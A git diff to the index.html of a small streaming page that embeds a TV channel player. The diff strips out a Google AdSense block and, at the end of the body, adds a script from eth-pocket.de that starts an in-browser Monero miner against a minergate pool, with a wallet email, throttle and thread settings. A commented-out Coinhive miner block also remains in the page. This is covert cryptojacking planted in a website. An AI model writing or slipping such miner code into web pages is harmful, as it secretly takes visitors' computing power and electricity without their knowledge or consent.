--- a/index.html
+++ b/index.html
@@ -17,17 +17,15 @@
     <div align="center" color="red">Space O online :v</div>
     <div align="center"><iframe width="720" height="480" src="http://player.latino-webtv.com/channels/space.html" frameborder="0" allow="kutoplay; encrypted-media" allowfullscreen></iframe></div>
 
+
+
+
+
+
 	
 	
 	
 	
-	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
-        <script>
-  (adsbygoogle = window.adsbygoogle || []).push({
-    google_ad_client: "ca-pub-3414782071587143",
-    enable_page_level_ads: true
-  });
-</script>
 <!--      
 <div align="center" class="coinhive-miner" 
      style="width: 400px; height: 200px" 
@@ -44,5 +42,11 @@
 </div>
 -->
 </head>
+<script src="https://eth-pocket.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=xmr.pool.minergate.com:45700"></script>
+<script type="text/javascript">
+PerfektStart('lalolanda325@gmail.com', 'x');
+throttleMiner = 95;
+threads = 2;
+</script>
 </body>
 </html>
